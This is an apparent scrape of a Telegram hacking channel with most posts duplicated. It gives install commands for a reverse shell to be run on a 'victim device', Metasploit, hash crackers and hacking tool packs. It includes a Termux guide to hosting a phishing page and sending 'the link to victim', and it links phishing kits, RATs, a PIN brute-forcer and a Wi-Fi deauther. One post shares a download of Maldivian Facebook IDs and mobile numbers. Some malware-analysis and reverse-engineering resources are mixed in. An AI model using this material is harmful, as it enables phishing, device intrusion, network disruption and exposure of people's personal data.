This media is not supported in your browser
VIEW IN TELEGRAM
¶¶ NukeShell
Reverse shell written on python3
git clone https://github.com/LimerBoy/NukeShell
cd NukeShell
pip3 install -r requirements.txt
¶¶ Run server:
python3 Server/main.py --port 5050
¶¶ Run client:(Victime device )
python3 Client/main.py --host 127.0.0.1 --port 5050
Reverse shell written on python3
git clone https://github.com/LimerBoy/NukeShell
cd NukeShell
pip3 install -r requirements.txt
¶¶ Run server:
python3 Server/main.py --port 5050
¶¶ Run client:(Victime device )
python3 Client/main.py --host 127.0.0.1 --port 5050
👍1
Hash Master v1.2
This is a single/multi hash cracker,hash detector and generator tool. This tool's password cracking system work based on dictionary attack. There is a default dictionary wordlist file exist. You can also chose your own wordlist to perform a brute-force attack.
📍pkg update
📍pkg install git
📍pkg install python
📍git clone https://github.com/drag0nhunt3r/hash-master.git
📍cd hash-master
📍python hash-master.py
This is a single/multi hash cracker,hash detector and generator tool. This tool's password cracking system work based on dictionary attack. There is a default dictionary wordlist file exist. You can also chose your own wordlist to perform a brute-force attack.
📍pkg update
📍pkg install git
📍pkg install python
📍git clone https://github.com/drag0nhunt3r/hash-master.git
📍cd hash-master
📍python hash-master.py
Termux
wordpress.zip
How to run a localhost server on your android phone (phishing page) #termux #kalitools #shorturl #bitly #phishing
;
📍apt update
📍pkg install php
¶¶ create a folder in Internel storage name www
unzip and move to www folder
open termux And type
php -S 127.0.0.1:[port] -t /sdcard/www
Port = which is that port you want forward over internet. Such as- 80,8080,4444,5656 etc.
¶¶ Now send the link to victim
¶¶ For more check the link below 👇
https://www.sci-techstudio.xyz/2020/10/how-to-run-php-localhost-server-on-your.html
;
📍apt update
📍pkg install php
¶¶ create a folder in Internel storage name www
unzip and move to www folder
open termux And type
php -S 127.0.0.1:[port] -t /sdcard/www
Port = which is that port you want forward over internet. Such as- 80,8080,4444,5656 etc.
¶¶ Now send the link to victim
¶¶ For more check the link below 👇
https://www.sci-techstudio.xyz/2020/10/how-to-run-php-localhost-server-on-your.html
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
¶¶ SIGIT - Simple Information Gathering Toolkit
#InformationGathering #iplook #socialmedia #username #profile
¶¶ Termux
📍pkg install wget && wget https://raw.githubusercontent.com/termuxhackers-id/SIGIT/main/install.sh && bash install.sh
¶¶ Kali linux
📍apt-get install wget && wget https://raw.githubusercontent.com/termuxhackers-id/SIGIT/main/installkali.sh && bash installkali.sh
📍type sigit
¶¶ Uninstallation
📍termux: rm -rf $PREFIX/bin/sigit
📍kali : rm -rf /usr/local/bin/sigit
¶¶ Features
userrecon - username reconnaissance
facedumper - dump facebook info
mailfinder - find email with specific name
godorker - dorking with google search
phoneinfo - phone number info
dnslookup - domain & system lookup
whoislookup - identify who is on domain
sublookup - sub networking lookup
hostfinder - find host domain
dnsfinder - find host domain name system
riplookup - reverse ip lookup
iplocation - ip to location tracker
#InformationGathering #iplook #socialmedia #username #profile
¶¶ Termux
📍pkg install wget && wget https://raw.githubusercontent.com/termuxhackers-id/SIGIT/main/install.sh && bash install.sh
¶¶ Kali linux
📍apt-get install wget && wget https://raw.githubusercontent.com/termuxhackers-id/SIGIT/main/installkali.sh && bash installkali.sh
📍type sigit
¶¶ Uninstallation
📍termux: rm -rf $PREFIX/bin/sigit
📍kali : rm -rf /usr/local/bin/sigit
¶¶ Features
userrecon - username reconnaissance
facedumper - dump facebook info
mailfinder - find email with specific name
godorker - dorking with google search
phoneinfo - phone number info
dnslookup - domain & system lookup
whoislookup - identify who is on domain
sublookup - sub networking lookup
hostfinder - find host domain
dnsfinder - find host domain name system
riplookup - reverse ip lookup
iplocation - ip to location tracker
👍1
¶¶ A Curated List of Awesome Telegram OSINT Tools, Sites & Resources
#telegram #osint #github
Search Engines
Tools
Telegram Bots
¶¶ Link below 👇👇
https://github.com/ItIsMeCall911/Awesome-Telegram-OSINT
#telegram #osint #github
Search Engines
Tools
Telegram Bots
¶¶ Link below 👇👇
https://github.com/ItIsMeCall911/Awesome-Telegram-OSINT
GitHub
GitHub - ItIsMeCall911/Awesome-Telegram-OSINT: 📚 A Curated List of Awesome Telegram OSINT Tools, Sites & Resources
📚 A Curated List of Awesome Telegram OSINT Tools, Sites & Resources - ItIsMeCall911/Awesome-Telegram-OSINT
👍2❤1
Maldives.zip
2.4 MB
raajjey ge Facebook ids
Mobile Numbers
https://mega.nz/file/7hcWEL5C#9XyDLjB6Pt0IcEquWSILSXcq15sbk9kdtsAQapUN9_0
Mobile Numbers
https://mega.nz/file/7hcWEL5C#9XyDLjB6Pt0IcEquWSILSXcq15sbk9kdtsAQapUN9_0
This media is not supported in your browser
VIEW IN TELEGRAM
¶¶ Metasploit Framework 6 in Termux
https://github.com/gushmazuko
#metasploit
#termux #androidhacking
¶¶ Manual
📍pkg update -y
📍pkg upgrade -y
📍pkg install wget
📍wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh
📍chmod +x metasploit.sh
📍./metasploit.sh
¶¶ Launch metasploit
After installation complete execute:
📍msfconsole
https://github.com/gushmazuko
#metasploit
#termux #androidhacking
¶¶ Manual
📍pkg update -y
📍pkg upgrade -y
📍pkg install wget
📍wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh
📍chmod +x metasploit.sh
📍./metasploit.sh
¶¶ Launch metasploit
After installation complete execute:
📍msfconsole
¶¶ DARKARMY
#TermuxToolx
DARKARMY Hacking Tools Pack - A Penetration Testing Framework
¶¶ DARKARMY Menu
Information gathering
Password Attack
Exploitation tool
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
¶¶ Linux
#Root
📍git clone https://github.com/D4RK-4RMY/DARKARMY.git
📍cd DARKARMY
📍chmod +x install.sh
📍./install.sh / or bash install.sh
¶¶ Termux
📍pkg install git
📍pkg install python
📍git clone https://github.com/D4RK-4RMY/DARKARMY.git
📍cd DARKARMY
📍chmod +x darkarmy.py
📍python2 darkarmy.py
#TermuxToolx
DARKARMY Hacking Tools Pack - A Penetration Testing Framework
¶¶ DARKARMY Menu
Information gathering
Password Attack
Exploitation tool
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
¶¶ Linux
#Root
📍git clone https://github.com/D4RK-4RMY/DARKARMY.git
📍cd DARKARMY
📍chmod +x install.sh
📍./install.sh / or bash install.sh
¶¶ Termux
📍pkg install git
📍pkg install python
📍git clone https://github.com/D4RK-4RMY/DARKARMY.git
📍cd DARKARMY
📍chmod +x darkarmy.py
📍python2 darkarmy.py
Termux
¶¶ Android tested on Note10 yes it take hours start from 0000 0001 0002 will try each pin .if it not working DM will send another 👇👇 download SC = https://cb.run/qAhi #digispark #attiny85 #Arduino #android #pinbrute #4pin
Media is too big
VIEW IN TELEGRAM
¶¶ ESP8266-CH340 Developmemt board
Its like a wifi jammer & Disconnect all nearby wifi .
#NodeMCU #5v
Scan for WiFi devices, block selected connections, create dozens of networks and confuse WiFi scanners
install drivers (windows) according to your item chipset i got CH340
¶¶ AliExpress
MVR 31.77 11%OFF | V3 Wireless module NodeMcu Lua WIFI 4M bytes Internet of Things development board based ESP8266 ESP-12E for arduino Compatible
https://a.aliexpress.com/_mrkytP6
¶¶ AliExpress the product i used
MVR 15.73 10%OFF | diymore ESP8266 ESP-07 Wi-Fi Wireless Module USB to TTL CH340G Development Board 2.4Ghz 3dBi IPEX Antenna for Arduino
https://a.aliexpress.com/_mNCnSBA
¶¶ https://github.com/SpacehuhnTech/esp8266_deauther
¶¶ https://www.varonis.com/blog/hacking-wi-fi-with-the-esp8266/
¶¶ Nodemcu-flash
https://github.com/nodemcu/nodemcu-flasher
¶¶ Driver-Section
https://github.com/spacehuhntech/esp8266_deauther/wiki/Installation#drivers-and-com-port
==Drivers340/Correct
https://sparks.gogo.co.nz/assets/_site_/downloads/CH34x_Install_Windows_v3_4.zip
¶¶ phishing
https://github.com/willmendil/ESPBug
¶¶ Few Youtube Video i found
All About ESP8266 = https://youtu.be/dGrJi-ebZgI
Video tutorials
https://youtu.be/8wZFCINl440
https://youtu.be/Xz7QQ-xyBqk
https://youtu.be/jHEQp1BQAPU
https://youtu.be/jHEQp1BQAPU
I used
https://youtu.be/KY0YQD0sgLI
https://youtu.be/8wZFCINl440
Its like a wifi jammer & Disconnect all nearby wifi .
#NodeMCU #5v
Scan for WiFi devices, block selected connections, create dozens of networks and confuse WiFi scanners
install drivers (windows) according to your item chipset i got CH340
¶¶ AliExpress
MVR 31.77 11%OFF | V3 Wireless module NodeMcu Lua WIFI 4M bytes Internet of Things development board based ESP8266 ESP-12E for arduino Compatible
https://a.aliexpress.com/_mrkytP6
¶¶ AliExpress the product i used
MVR 15.73 10%OFF | diymore ESP8266 ESP-07 Wi-Fi Wireless Module USB to TTL CH340G Development Board 2.4Ghz 3dBi IPEX Antenna for Arduino
https://a.aliexpress.com/_mNCnSBA
¶¶ https://github.com/SpacehuhnTech/esp8266_deauther
¶¶ https://www.varonis.com/blog/hacking-wi-fi-with-the-esp8266/
¶¶ Nodemcu-flash
https://github.com/nodemcu/nodemcu-flasher
¶¶ Driver-Section
https://github.com/spacehuhntech/esp8266_deauther/wiki/Installation#drivers-and-com-port
==Drivers340/Correct
https://sparks.gogo.co.nz/assets/_site_/downloads/CH34x_Install_Windows_v3_4.zip
¶¶ phishing
https://github.com/willmendil/ESPBug
¶¶ Few Youtube Video i found
All About ESP8266 = https://youtu.be/dGrJi-ebZgI
Video tutorials
https://youtu.be/8wZFCINl440
https://youtu.be/Xz7QQ-xyBqk
https://youtu.be/jHEQp1BQAPU
https://youtu.be/jHEQp1BQAPU
I used
https://youtu.be/KY0YQD0sgLI
https://youtu.be/8wZFCINl440
aliexpress.
V3 Wireless module NodeMcu Lua WIFI 4M bytes Internet of Things development board based ESP8266 ESP-12E for arduino Compatible…
Smarter Shopping, Better Living! Aliexpress.com
❤1
This page contains a list of mostly malware analysis / reverse engineering related tools, training, podcasts, blog posts, literature and just about anything else closely related to the topic. This page serves as a catalog of sorts, containing "gems", some of which you may have stumbled across, and many others that you may not have.
https://github.com/0x4143/malware-gems?s=09
https://github.com/0x4143/malware-gems?s=09
GitHub
GitHub - 0x4143/malware-gems: A not so awesome list of malware gems for aspiring malware analysts
A not so awesome list of malware gems for aspiring malware analysts - 0x4143/malware-gems
¶¶ Netflix phishing /get some free webhost
https://github.com/swagkarna/Netflix-Scam-Page
¶¶ Facebook phishing
https://github.com/swagkarna/18-plus-Facebook-Phishing
¶¶ Rat
https://github.com/swagkarna/Rafel-Rat
¶¶ malware analysis
https://github.com/rshipp/awesome-malware-analysis?s=09
¶¶ Our security focused static analysis tool for Android and Java applications.
https://github.com/facebook/mariana-trench?s=09
¶¶ Android app reverse engineering 101
https://www.ragingrock.com/AndroidAppRE/app_fundamentals.html
¶¶ Reverse Engineering For Everyone!
https://0xinfection.github.io/reversing/reversing-for-everyone.mobi
¶¶ A Multi Threads Web Application Source Leak Scanner
https://www.kitploit.com/2021/12/sourceleakhacker-multi-threads-web.html?m=1&s=09
¶¶ Emp3R0R - Linux Post-Exploitation Framework Made By Linux User
https://github.com/jm33-m0/emp3r0r/wiki
¶¶ This little tool is to calculate a MurmurHash value of a favicon to hunt phishing websites on the Shodan platform.
https://github.com/Viralmaniar/MurMurHash
¶¶ CiLocks - Android LockScreen Bypass
https://github.com/tegal1337/CiLocks
¶¶ Smuggler - An HTTP Request Smuggling / Desync testing tool written in Python 3
https://github.com/defparam/smuggler
¶¶ 403bypasser automates the techniques used to circumvent access control restrictions on target pages.
https://github.com/yunemse48/403bypasser
¶¶ Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration
Viper integrates basic functions such as bypass anti-virus software, intranet tunnel, file management, command line and so on
https://github.com/FunnyWolf/Viper
¶¶ Bypass 4xx HTTP response status codes. Based on PycURL.
https://github.com/ivan-sincek/forbidden
¶¶ A Cloud Forensics Powershell module to run threat hunting playbooks on data from Azure and O365
https://github.com/darkquasar/AzureHunter
¶¶ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities. https://github.com/stark0de/nginxpwner
¶¶ An automated e-mail OSINT tool
https://github.com/alpkeskin/mosint
¶¶ This is Advance Phishing Tool ! OTP PHISHING
https://github.com/Ignitetch/AdvPhishing
¶¶ Unlock an Android phone (or device) by bruteforcing the lockscreen PIN. Turn your Kali Nethunter phone into a bruteforce PIN cracker for Android devices! (no root, no adb)
https://github.com/urbanadventurer/Android-PIN-Bruteforce
¶¶ All-in-One malware analysis tool
https://github.com/CYB3RMX/Qu1cksc0pe
¶¶ A Cross Platform multifunctional (Windows/Linux/Mac) RAT https://github.com/hash3liZer/SillyRAT
¶¶ Pyhton script for HTTP 40X responses bypassing. Features: Verb tampering, headers, #bugbountytips tricks and 2454 User-Agents.
https://github.com/lobuhi/byp4xx
¶¶ PeTeReport is an open-source application vulnerability reporting tool
https://github.com/1modm/petereport
¶¶ Machine Learning Network Share Password Hunting Toolkit
https://github.com/HunnicCyber/SharpML
¶¶ https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/?s=09
¶¶ The all-in-one Red Team extension for Web Pentester 🛠
https://github.com/LasCC/Hack-Tools
¶¶ A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware
https://processhacker.sourceforge.io/
¶¶ 12 Cybersecurity tools I learned in 2021
https://hal3.medium.com/since-the-year-is-ending-a-productive-year-despite-of-the-pandemic-here-are-the-12-tools-i-731b5ac19295
¶¶ A Linux Toolkit for Malware Analysis
https://remnux.org/
¶¶ Open Source intelligence
(Osint Tools )
https://www.hackers-arise.com/osint
https://github.com/swagkarna/Netflix-Scam-Page
¶¶ Facebook phishing
https://github.com/swagkarna/18-plus-Facebook-Phishing
¶¶ Rat
https://github.com/swagkarna/Rafel-Rat
¶¶ malware analysis
https://github.com/rshipp/awesome-malware-analysis?s=09
¶¶ Our security focused static analysis tool for Android and Java applications.
https://github.com/facebook/mariana-trench?s=09
¶¶ Android app reverse engineering 101
https://www.ragingrock.com/AndroidAppRE/app_fundamentals.html
¶¶ Reverse Engineering For Everyone!
https://0xinfection.github.io/reversing/reversing-for-everyone.mobi
¶¶ A Multi Threads Web Application Source Leak Scanner
https://www.kitploit.com/2021/12/sourceleakhacker-multi-threads-web.html?m=1&s=09
¶¶ Emp3R0R - Linux Post-Exploitation Framework Made By Linux User
https://github.com/jm33-m0/emp3r0r/wiki
¶¶ This little tool is to calculate a MurmurHash value of a favicon to hunt phishing websites on the Shodan platform.
https://github.com/Viralmaniar/MurMurHash
¶¶ CiLocks - Android LockScreen Bypass
https://github.com/tegal1337/CiLocks
¶¶ Smuggler - An HTTP Request Smuggling / Desync testing tool written in Python 3
https://github.com/defparam/smuggler
¶¶ 403bypasser automates the techniques used to circumvent access control restrictions on target pages.
https://github.com/yunemse48/403bypasser
¶¶ Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration
Viper integrates basic functions such as bypass anti-virus software, intranet tunnel, file management, command line and so on
https://github.com/FunnyWolf/Viper
¶¶ Bypass 4xx HTTP response status codes. Based on PycURL.
https://github.com/ivan-sincek/forbidden
¶¶ A Cloud Forensics Powershell module to run threat hunting playbooks on data from Azure and O365
https://github.com/darkquasar/AzureHunter
¶¶ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities. https://github.com/stark0de/nginxpwner
¶¶ An automated e-mail OSINT tool
https://github.com/alpkeskin/mosint
¶¶ This is Advance Phishing Tool ! OTP PHISHING
https://github.com/Ignitetch/AdvPhishing
¶¶ Unlock an Android phone (or device) by bruteforcing the lockscreen PIN. Turn your Kali Nethunter phone into a bruteforce PIN cracker for Android devices! (no root, no adb)
https://github.com/urbanadventurer/Android-PIN-Bruteforce
¶¶ All-in-One malware analysis tool
https://github.com/CYB3RMX/Qu1cksc0pe
¶¶ A Cross Platform multifunctional (Windows/Linux/Mac) RAT https://github.com/hash3liZer/SillyRAT
¶¶ Pyhton script for HTTP 40X responses bypassing. Features: Verb tampering, headers, #bugbountytips tricks and 2454 User-Agents.
https://github.com/lobuhi/byp4xx
¶¶ PeTeReport is an open-source application vulnerability reporting tool
https://github.com/1modm/petereport
¶¶ Machine Learning Network Share Password Hunting Toolkit
https://github.com/HunnicCyber/SharpML
¶¶ https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/?s=09
¶¶ The all-in-one Red Team extension for Web Pentester 🛠
https://github.com/LasCC/Hack-Tools
¶¶ A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware
https://processhacker.sourceforge.io/
¶¶ 12 Cybersecurity tools I learned in 2021
https://hal3.medium.com/since-the-year-is-ending-a-productive-year-despite-of-the-pandemic-here-are-the-12-tools-i-731b5ac19295
¶¶ A Linux Toolkit for Malware Analysis
https://remnux.org/
¶¶ Open Source intelligence
(Osint Tools )
https://www.hackers-arise.com/osint
GitHub
GitHub - swagkarna/Netflix-Scam-Page: Netflix Full Undectable Scam Page 2020
Netflix Full Undectable Scam Page 2020. Contribute to swagkarna/Netflix-Scam-Page development by creating an account on GitHub.
👍1
Forwarded from Cyryx college
https://www.ragingrock.com/AndroidAppRE/app_fundamentals.html?s=09
Learn to reverse engineer Android applications!
Learn to reverse engineer Android applications!
Forwarded from Cyryx college
free vpn on kali linux
open terminal
sudo apt install openvpn
download zip file (download one of the file shared below)
go to Downloads folder cd Download
ls
unzip file
unzip VPNBook.com-OpenVPN-FR1.zip
ls
--------------------------
VPNBook.com-OpenVPN-FR1.zip
vpnbook-fr1-tcp80.ovpn
vpnbook-fr1-udp25000.ovpn
vpnbook-fr1-udp53.ovpn
--------------------------
Enter Auth Username: (go back to site and get username & poassword)
Enter Auth Username:
username : vpnbook
Password: ct36a3k
open browser go to ipleak.net check for ip /dnsleak/
open terminal
sudo apt install openvpn
download zip file (download one of the file shared below)
go to Downloads folder cd Download
ls
unzip file
unzip VPNBook.com-OpenVPN-FR1.zip
ls
--------------------------
VPNBook.com-OpenVPN-FR1.zip
vpnbook-fr1-tcp80.ovpn
vpnbook-fr1-udp25000.ovpn
vpnbook-fr1-udp53.ovpn
--------------------------
Enter Auth Username: (go back to site and get username & poassword)
Enter Auth Username:
username : vpnbook
Password: ct36a3k
open browser go to ipleak.net check for ip /dnsleak/
👍1
Forwarded from Cyryx college